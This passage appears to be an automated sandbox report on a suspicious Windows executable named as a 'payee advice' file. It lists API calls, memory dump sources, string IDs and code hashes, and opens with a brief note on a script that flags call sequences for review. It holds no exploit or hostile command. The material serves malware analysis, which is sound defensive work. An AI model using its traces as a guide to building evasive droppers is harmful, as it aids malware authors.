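    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808), ref: 1000162F
    • GlobalAlloc.KERNEL32(00000040,00000000), ref: 10001636
    • GetProcAddress.KERNEL32(10002167,00000000), ref: 10001651
    • GlobalFree.KERNEL32(00000000), ref: 1000165A
    Memory Dump Source
    • Source File: 00000000.00000002.2690936672.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
"""
```

`scan(SAMPLE)` reports the registry function near 00402B9B in the 00400000 image and the resolver near 1000162F in the 10000000 image; the lstrcpyW/GlobalFree record is not flagged because it never reaches GetProcAddress. The match is a subsequence over a flat call list, so it ignores control flow (two calls can sit in mutually exclusive branches) and says nothing about what is deleted or resolved; treat a hit as the address to open in the disassembly, not as a verdict, since an enumerate-and-delete loop is equally what an uninstall routine looks like.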
APIs
• GetDlgItem.USER32(?,?), ref: 00401CEB
• GetClientRect.USER32(00000000,?), ref: 00401CF8
• LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
• SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
• DeleteObject.GDI32(00000000), ref: 00401D36
Memory Dump Source
• Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: ClientDeleteImageItemLoadMessageObjectRectSend
• String ID:
• API String ID: 1849352358-0
• Opcode ID: d593e7263c37e61c996d4e257660d94f001a2630b08086f07ab1fbfa1127a49e
• Instruction ID: 62a37a396924b9b833916b179176740e0848b2f5cedec3081aefe4e9105dc113
• Opcode Fuzzy Hash: d593e7263c37e61c996d4e257660d94f001a2630b08086f07ab1fbfa1127a49e
• Instruction Fuzzy Hash: F0F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
APIs
• lstrlenW.KERNEL32(004226D0,004226D0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A09
• wsprintfW.USER32 ref: 00404A12
• SetDlgItemTextW.USER32(?,004226D0), ref: 00404A25
Strings
Memory Dump Source
• Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: ItemTextlstrlenwsprintf
• String ID: %u.%u%s%s
• API String ID: 3540041739-3551169577
• Opcode ID: 5ac319f3f1fbe76218499090b5c3f3a2c47b89264d6babd6022050aef882dcc8
• Instruction ID: 6b2e2e184c3c611d12d6b53aa9198873543b26f6782fca7c8cbe4a2e3a07221a
• Opcode Fuzzy Hash: 5ac319f3f1fbe76218499090b5c3f3a2c47b89264d6babd6022050aef882dcc8
• Instruction Fuzzy Hash: 1411E2736001243BCB10A66D9C45EEF368D9BC6334F180637FA29F61D1DA799C2186EC
APIs
• SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
• SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
Strings
Memory Dump Source
• Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: MessageSend$Timeout
• String ID: !
• API String ID: 1777923405-2657877971
• Opcode ID: 5e1f230eecded0db815b532ef795033685ed3b5cfc855201c3a552c7fdd4c815
• Instruction ID: 3450dd174e4bd499bd5dd80d9ee349d4783428bbf063aee010979b0fef1ae38f
• Opcode Fuzzy Hash: 5e1f230eecded0db815b532ef795033685ed3b5cfc855201c3a552c7fdd4c815
• Instruction Fuzzy Hash: D8217471A44109BEEF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                                                                                                          APIs
                                                                                                                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,00403512), ref: 0040593B
                                                                                                                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,00403512), ref: 00405945
                                                                                                                                          • lstrcatW.KERNEL32(?,00409014), ref: 00405957
                                                                                                                                          Strings
                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405935
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CharPrevlstrcatlstrlen
                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                          • API String ID: 2659869361-823278215
                                                                                                                                          • Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                                                                                                          • Instruction ID: 6247f5a3c9563be90945cd41d23768fa590745b080056b24a315d5606c671452
                                                                                                                                          • Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                                                                                                          • Instruction Fuzzy Hash: E5D05E21101921AAC21277448C04DDF669CEE45300384002AF200B20A2CB7C1D518BFD
                                                                                                                                          APIs
                                                                                                                                          • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                                                                                                          • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                                                                                                          • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                                                                                                            • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1404258612-0
                                                                                                                                          • Opcode ID: 0759821644e88925b44a7e9fb1563554894f113fe06b33f49c2a0c28299a5465
                                                                                                                                          • Instruction ID: 0d64a3d5d22a86ce83a9b45ae5cd800923300da454a86426803db7941f711343
                                                                                                                                          • Opcode Fuzzy Hash: 0759821644e88925b44a7e9fb1563554894f113fe06b33f49c2a0c28299a5465
                                                                                                                                          • Instruction Fuzzy Hash: 76113675A00208AFDB00DFA5C945DAEBBB9EF04344F20407AF905F62A1D7349E50CB68
                                                                                                                                          APIs
                                                                                                                                          • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75922EE0,004037F6,75923420,00403621,?), ref: 00403839
                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00403840
                                                                                                                                          Strings
                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403831
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Free$GlobalLibrary
                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                          • API String ID: 1100898210-823278215
                                                                                                                                          • Opcode ID: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
                                                                                                                                          • Instruction ID: bf490ea997193b46d556285b385326fb3516ec302950e4cd11f154ac4515a356
                                                                                                                                          • Opcode Fuzzy Hash: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
                                                                                                                                          • Instruction Fuzzy Hash: F9E0C23394102057C7216F15ED04B1ABBE86F89B22F018476F9407B7A283746C528BED
                                                                                                                                          APIs
                                                                                                                                          • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe,C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe,80000000,00000003), ref: 00405987
                                                                                                                                          • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe,C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe,80000000,00000003), ref: 00405997
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CharPrevlstrlen
                                                                                                                                          • String ID: C:\Users\user\Desktop
                                                                                                                                          • API String ID: 2709904686-1246513382
                                                                                                                                          • Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                                                                                                          • Instruction ID: e5431d3d33a146c3150d202dfaa2e9e12a1dec100281116c20088c3141bfb115
                                                                                                                                          • Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                                                                                                          • Instruction Fuzzy Hash: C6D05EA2414920DED3226704DC44AAFA3ACEF113107894466F901E61A5D7785C808AFD
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,00000001), ref: 10001260
                                                                                                                                            • Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271
                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2690936672.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2690910719.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                          • Associated: 00000000.00000002.2690980563.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                          • Associated: 00000000.00000002.2691009289.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Global$Free$Alloclstrcpy
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 852173138-0
                                                                                                                                          • Opcode ID: a36c3baa5ea934aaf830980c9406ed3c53712f48e27dcab7b4d6d185e039dd99
                                                                                                                                          • Instruction ID: c8ae98bcc35e74d2b72c58860f7bdf59a74f39180ec1ffd54fa0f92d9f30571b
                                                                                                                                          • Opcode Fuzzy Hash: a36c3baa5ea934aaf830980c9406ed3c53712f48e27dcab7b4d6d185e039dd99
                                                                                                                                          • Instruction Fuzzy Hash: 5E3190F6904211AFF314CF64DC859EA77E8EB853D0B124529FB41E726CEB34E8018765
                                                                                                                                          APIs
                                                                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405ACB
                                                                                                                                          • lstrcmpiA.KERNEL32(00405CF5,00000000), ref: 00405AE3
                                                                                                                                          • CharNextA.USER32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AF4
                                                                                                                                          • lstrlenA.KERNEL32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFD
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 190613189-0
                                                                                                                                          • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                                                          • Instruction ID: dad0a046b028959ebe33103b56e1cab2fddac0818810981e259aca52f0e6fc56
                                                                                                                                          • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                                                          • Instruction Fuzzy Hash: 59F06232608558BFC712DFA5DD40D9FBBA8DF06260B2540B6F801F7251D674FE019BA9

                                                                                                                                          Execution Graph

                                                                                                                                          Execution Coverage:7.8%
                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                          Signature Coverage:11.8%
                                                                                                                                          Total number of Nodes:93
                                                                                                                                          Total number of Limit Nodes:8
Strings
Memory Dump Source
• Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID:
• String ID: >o9$>o9$>o9$N
• API String ID: 0-1948691326
• Opcode ID: 6097843ee863970c5d35e2dc29a73525e45e226bf976b0a87ea7487bd6bd383b
• Instruction ID: a30ce76fe5b873ec483a5a80c390a20895b715523c54cc3959466c5fe7cc09c1
• Opcode Fuzzy Hash: 6097843ee863970c5d35e2dc29a73525e45e226bf976b0a87ea7487bd6bd383b
• Instruction Fuzzy Hash: 6373F731C1075A8EDB10EF68C854AADF7B1FF99300F51D69AE44967221EB70AAD4CF81
Strings
Memory Dump Source
• Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID:
• String ID: (o]q$4']q$4']q$4']q
• API String ID: 0-875651895
• Opcode ID: c03625e0c08be1bf960dd3d68dd1d227d46f78f4db18ddb1d43462b682d17f18
• Instruction ID: 71ed45cf23857632f74839e09c9ddf7c516ae63be1f4d2b0ebd1f50599e02208
• Opcode Fuzzy Hash: c03625e0c08be1bf960dd3d68dd1d227d46f78f4db18ddb1d43462b682d17f18
• Instruction Fuzzy Hash: D6A28071600209CFCB15CFA8C994AAEBBF2BF89310F55855AE405EB261D731ED91CF52

Control-flow Graph (rendered graph omitted; node legend: Executed / Not Executed)
Strings
Memory Dump Source
• Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID:
• String ID: (o]q$(o]q$,aq$,aq
• API String ID: 0-1947289240
• Opcode ID: 4e2b611bb2ebb5798dfc2cd6c9364c63d71ef80291efa6dd50a1f684cfca0e0c
• Instruction ID: 9ad1432be97aed72d0b808e4be7ff9e5c29a631de81c39489cad2bc5e742548d
• Opcode Fuzzy Hash: 4e2b611bb2ebb5798dfc2cd6c9364c63d71ef80291efa6dd50a1f684cfca0e0c
• Instruction Fuzzy Hash: 82025F70A08219DFCB15CF69CC94AADBBF2BF49308F65806AE815AB3A1D730DD51CB51
Strings
Memory Dump Source
• Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID:
• String ID: PH]q$PH]q
• API String ID: 0-1166926398
• Opcode ID: 6ea71aa535f0e87d2a83d1de42580a0585352834984d2a123cc71270a039ac73
• Instruction ID: f84d5c67b8b195264ed4893a3d98456f5949235331de640e94b1c5d6c3a956d4
• Opcode Fuzzy Hash: 6ea71aa535f0e87d2a83d1de42580a0585352834984d2a123cc71270a039ac73
• Instruction Fuzzy Hash: 37A1D874E01258CFDB18DFA9D894AADBBF2BF89300F15806AE459AB365DB309D41CF50
Strings
Memory Dump Source
• Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID:
• String ID: PH]q$PH]q
• API String ID: 0-1166926398
• Opcode ID: c2fc7add6f5994b34163ccb892f621d5f0d04eb1cda2bb6781eb32618057c157
• Instruction ID: adb9e90165ed1e16796fd04ad2b8e7582e6fe868a43f070a4a790476a1395a21
• Opcode Fuzzy Hash: c2fc7add6f5994b34163ccb892f621d5f0d04eb1cda2bb6781eb32618057c157
• Instruction Fuzzy Hash: 9691E974E00658CFDB18DFA9D884A9DBBF2BF89300F15C0AAE459AB365DB309945CF50
Strings
Memory Dump Source
• Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID:
• String ID: PH]q$PH]q
• API String ID: 0-1166926398
• Opcode ID: fef3930c37e03e846a9737132fee560f85b271d22760758598a12ef7fb8a9f05
• Instruction ID: 14d127db6f869efbee5be826b3c3c9902a1f533d02bf61ec593c93b0a9e02edf
• Opcode Fuzzy Hash: fef3930c37e03e846a9737132fee560f85b271d22760758598a12ef7fb8a9f05
• Instruction Fuzzy Hash: C491E774E00258CFDB18DFA9D884AADBBF2BF89300F24D16AE459AB365DB305941CF50
Strings
Memory Dump Source
• Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID:
• String ID: PH]q$PH]q
• API String ID: 0-1166926398
• Opcode ID: b114f74619f214094ed6ff7a61bb2a91875ec230f8e030d6f0739816687a060d
• Instruction ID: da1cad7a9e34e9d70b2e838764fac19a4095145abf78ddd83c9a455960b6becd
• Opcode Fuzzy Hash: b114f74619f214094ed6ff7a61bb2a91875ec230f8e030d6f0739816687a060d
• Instruction Fuzzy Hash: 0981B3B4E00258CFDB18DFAAD884A9DBBF2BF89300F148069E459AB365DB349945CF51
Strings
Memory Dump Source
• Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID:
• String ID: PH]q$PH]q
• API String ID: 0-1166926398
• Opcode ID: 70ff244097895fc5b376e654968cda1eb68cc739495ecf8c174179aafcb32457
• Instruction ID: 24136ee3df2b8c7586584beb93b4360ba6556e8518f35a7d2003e4d42f7e09de
• Opcode Fuzzy Hash: 70ff244097895fc5b376e654968cda1eb68cc739495ecf8c174179aafcb32457
• Instruction Fuzzy Hash: EC81B474E01258CFDB18DFAAD894AADBBF2BF89300F14C069E459AB365DB349941CF50
Strings
Memory Dump Source
• Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID:
• String ID: PH]q$PH]q
• API String ID: 0-1166926398
• Opcode ID: e17571fd62dfae5777063000a33494449ea5ad28823effe962674868d24bb54a
• Instruction ID: 42fc8a3ee2af445a4ac93317a1993226f0f9a3e7e98420a981b2c9fee40c8c1f
• Opcode Fuzzy Hash: e17571fd62dfae5777063000a33494449ea5ad28823effe962674868d24bb54a
• Instruction Fuzzy Hash: D581B574E00218CFDB18DFAAD984AADBBF2BF89304F14D069E459AB365DB349941CF50
Strings
Memory Dump Source
• Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID:
• String ID: PH]q$PH]q
• API String ID: 0-1166926398
• Opcode ID: 214a39e4baf1312090365d453b49d556aec37a64297f35e53489b5bd5ec637f1
• Instruction ID: 7c5b2083e2825df971f75efda8aea14121f40bf2771090662629fd7ed5346457
• Opcode Fuzzy Hash: 214a39e4baf1312090365d453b49d556aec37a64297f35e53489b5bd5ec637f1
• Instruction Fuzzy Hash: F281B474E00258CFDB18DFAAC884AADBBF2BF89300F14C069E459AB365DB359945CF50
Strings
Memory Dump Source
• Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID:
• String ID: PH]q$PH]q
• API String ID: 0-1166926398
• Opcode ID: 899f61d5ca5188c0a05b59693778efb06d6413dfbe168eef86d2c8802b0cd184
• Instruction ID: f588dbbdc0263344d0aa32b47f76be532446850bc345df1ab9ec28009e11adaf
• Opcode Fuzzy Hash: 899f61d5ca5188c0a05b59693778efb06d6413dfbe168eef86d2c8802b0cd184
